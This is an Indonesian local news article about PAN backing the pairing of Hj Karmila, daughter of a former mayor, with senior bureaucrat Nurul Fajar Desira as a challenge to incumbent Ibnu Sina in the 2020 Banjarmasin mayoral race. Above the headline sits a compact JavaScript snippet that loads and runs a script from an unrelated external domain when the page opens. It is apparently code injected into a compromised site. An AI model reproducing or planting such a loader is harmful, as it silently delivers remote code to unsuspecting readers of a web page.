(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Duet Hj Karmila-Fajar Desira Bisa Jadi Ancaman Serius Incumbent di Pilkada Banjarmasin


BANJARMASIN, Tarung Pilkada Banjarmasin makin serius. Sejumlah kandidat mulai bergerak membangun basis dukungan dalam kontestasi pemilihan Walikota dan Wakil Walikota Banjarmasin tahun 2020 nanti. Munculnya duet Hj Karmila—putri mantan Walikota Banjarmasin H Muhidin, yang berpasangan dengan Nurul Fajar Desira, kepala Bappeda Kalsel, akan menjadi ancaman serius bagi incumbent Walikota Ibnu Sina yang memutuskan maju kembali. Lalu, akankah ‘mitos’ jabatan Walikota Banjarmasin cuma 1 periode nanti akan kembali terjadi?

Dibanding kandidat lain, duet Hj Karmila-Fajar Desira yang disokong Partai Amanat Nasional (PAN) ini sudah selangkah dibandingkan yang lain. Sebab sampai saat ini, belum ada kandidat lain yang telah mengusung paket pasangan selain mereka. Ibnu Sina pun, selaku incumbent yang maju lagi dengan kendaraan PKS, juga belum mengumumkan calonnya. Sebab PKS masih memerlukan gerbong partai lain untuk bisa mengajukan pasangan paket di Pilkada nanti.

Begitu juga dengan Wakil Walikota Hermansyah, yang kabarnya maju lewat PDIP juga belum memiliki pasangan. Pun dengan Ketua DPD Golkar Banjarmasin Hj Ananda, yang masih belum menemukan pasangan untuk calon Walikota.

Dalam hal ini, PAN memang memiliki kelebihan dibanding parpol lain. Bermodal 9 kursi di DPRD Kota Banjarmasin hasil Pemilu 2019, PAN bisa mengusung kandidat walikota sendiri. Meski demikian, PAN juga tidak menutup kemungkinan untuk mengajak partai lain dalam koalisi untuk semakin memantabkan langkahnya.

Di sisi lain, elektabilitas Hj Karmila sebagai pendatang baru dalam kancah perpolitikan Kalsel tak bisa dianggap sebelah mata. Sebab pada pileg lalu, ia mampu meraih 42.114 suara. Tertinggi kedua kedua untuk perolehan suara di Kalsel setelah H Rusli, Ketua DPRD Banjar.

Sementara itu, mengimbangi Hj Karmila yang bisa dibilang ‘hijau’ dalam pengalaman pemerintahan, sosok Nurul Fajar Desira, bisa lengkapi. Sebagai sosok birokrat senior, Fajar Desira memiliki banyak pengalaman di urusan pemerintahan.

Kepastian majunya duet Hj Karmila-Fajar Desira ini disampaikan langsung Ketua DPW PAN Kalsel Hj Muhidin kepada kanalkalimantan.com. Ditemui di sela-sela Puncak Harjad ke 493 Kota Banjarmasin pada Selasa (24/9) malam, Muhidin tidak menampik, PAN akan mengusung kadernya sendiri pada pilkada di Kota Banjarmasin.

H Muhiddin. foto: fikri

“Insya Allah kalau masyarakat menghendaki juga, kemungkinan saya akan menurunkan anak saya (Hj. Karmila). Berdampingan dengan Pak Fajar (Nurul Fajar Desira),” tegasnya, Selasa (24/9) malam.

Menariknya, kebetulan saat sesi wawancara, Kepala Bappeda Kalsel ini mendampingi H. Muhidin. Bahkan, baju sasirangan yang digunakan pun nyaris sama. “Kita tidak menyangka. Tidak janjian,” kelakarnya.

Kendati telah mendapat restu dari sang ayah, Hj. Karmila mengaku mengikuti instruksi sang ayah. “Kalau diperintahkan saya ngikut saja kata bapak,” kata Karmila.

Ketika ditanya kesiapannya untuk terjun dalam pilwali Banjarmasin, Hj. Karmila pun menyatakan siap. Meski demikian, untuk program yang akan “dijual” pada pilwali mendatang, Hj. Karmila mengaku belum mempersiapkannya. “Masih belum (disiapkan),” pungkasnya.

Sementara itu, Fajar Desira yang digadang-gadang menjadi pendamping Hj. Karmila pada pilwali Banjarmasin mendatang, masih malu-malu kucing. “Tunggu saja. Insyaallah jika Tuhan menghendaki kita siap,” tegas mantan Kepala Bappeda Kota Banjarmasin ini.

Menurut Fajar, baik di birokrasi maupun di kancah politik, tujuannya sama yaitu mengabdi kepada masyarakat. Apalagi, dirinya saat ini masih aktif sebagai aparatur sipil negara (ASN) di lingkungan Pemprov Kalsel. “Insyaallah di mana saja sama. Kita akan siap,” katanya. “Harus hati-hati ngomong,” tutup Fajar sembari berlalu. (fikri)

Reporter : fikri
Editor : chell

 


Desy Arfianty

Recent Posts

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

57 menit ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

2 jam ago

Nilai Posisi Waspada, Pemkab Kapuas Gelar Rakor SPI MCP dan LHKPN

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas melalui Inspektorat melaksanakan rapat koordinasi (Rakor) terkait… Read More

3 jam ago

LITERASI EMOSIONAL DI MEDIA SOSIAL: MENGELOLA EMOSI DAN INTERAKASI ONLINE

"WEBINAR INDONESIA MAKIN CAKAP DIGITAL" WILAYAH KALIMANTAN Read More

4 jam ago

Wabup Banjar Hadiri Haul Ke-68 KH Zainal Ilmi

KANALKALIMANTAN.COM, MARTAPURA - Wakil Bupati Banjar Habib Idrus Al Habsyi betbaur dengan ribuan orang menghadiri… Read More

5 jam ago

Simulasi Keadaan Darurat di Terminal BBM Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - PT Pertamina Patra Niaga Integrated Terminal Banjarmasin melakukan simulasi keadaan darurat bersama… Read More

15 jam ago

This website uses cookies.